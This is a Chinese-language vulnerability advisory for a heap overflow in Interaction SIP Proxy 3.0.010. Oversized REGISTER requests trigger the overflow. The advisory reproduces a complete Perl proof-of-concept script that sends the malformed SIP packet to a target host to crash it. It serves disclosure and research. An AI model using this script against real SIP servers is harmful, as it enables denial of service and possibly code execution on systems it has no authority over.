安全研究
安全漏洞
Interaction SIP Proxy远程堆溢出漏洞
发布日期:2005-12-21
更新日期:2005-12-21
受影响系统:
Interactive Intelligence Interaction SIP Proxy 3.0.010描述:
BUGTRAQ ID: 16001
Interaction SIP Proxy是一款基于Microsoft Windows的代理服务器。
Interaction SIP Proxy在处理超长的REGISTER请求时存在漏洞,远程攻击者可能利用此漏洞在服务器上执行任意指令。
Interaction SIP Proxy的i3sipmsg.dll中的代码负责处理SIP请求。如果攻击者能够在REGISTER请求行中发送2900个字节(0x20)或TAB(0x09)字符做为SIP版本的话,就可以导致SIPParser函数中出现堆溢出。成功利用这个漏洞的攻击者可以导致拒绝服务,也可能执行任意代码。
<*来源:Behrang Fouladi (behrang@hat-squad.com)
Brett Moore (brett.moore@SECURITY-ASSESSMENT.COM)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=113519223917192&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
##
#i3 SIP Proxy POC - http://www.hat-squad.com/en/000171.html
#This vulnerability allows a remote user to overwrite heap memory of i3sipproxy.
#The request size varies, but size=2900 bytes works in most of the cases. Successful
#exploitation of this bug for code executuion requires a magic combination of
#pre-allocations, data and size.
#
use strict;
use IO::Socket::INET;
my $host = shift(@ARGV);
my $size = shift(@ARGV);
my $port=5060;
print "\n\n Interactive SIP proxy heap corruption POC \n\n";
print " By Behrang Fouladi, Hat-Squad Security Team \n\n";
print(" Usage: perl $0 \n\n"),exit if(!$host || !$size);
my $iaddr=inet_aton($host) || die ("Unable to resolve $host");
socket(DoS,PF_INET,SOCK_DGRAM,17);
my $sip= "REGISTER sip:test\@test.com SIP/";
$sip.= "\x20"x$size;
$sip.= "\r\n";
$sip.= "Via: SIP/2.0/TCP 192.168.0.1:7043";
$sip.= "\r\n";
$sip.= "Max-Forwards: 70\r\n";
$sip.= "From: ;tag=ec8c2399e9\r\n";
$sip.= "To: \r\n";
$sip.= "Call-ID: 1b6c7397b109453c93d85edc88d9810e\r\n";
$sip.= "CSeq: 1 REGISTER\r\n";
$sip.= "Contact: ;methods=\"INVITE, MESSAGE, INFO, SUBSCRIBE, OPTIONS, BYE, CANCEL, NOTIFY, ACK, REFER, BENOTIFY\";proxy=replace\r\n";
$sip.= "Content-Length: 0\r\n";
$sip.= "\r\n";
send(DoS,$sip,0,sockaddr_in($port,$iaddr));
print " Exploit Sent to $host...\n";
print " The SIP Proxy should crash now.\n\n";
exit(0);
建议:
厂商补丁:
Interactive Intelligence
------------------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.inin.com/SIPProxy/default.asp
浏览次数:3071
严重程度:0(网友投票)
绿盟科技给您安全的保障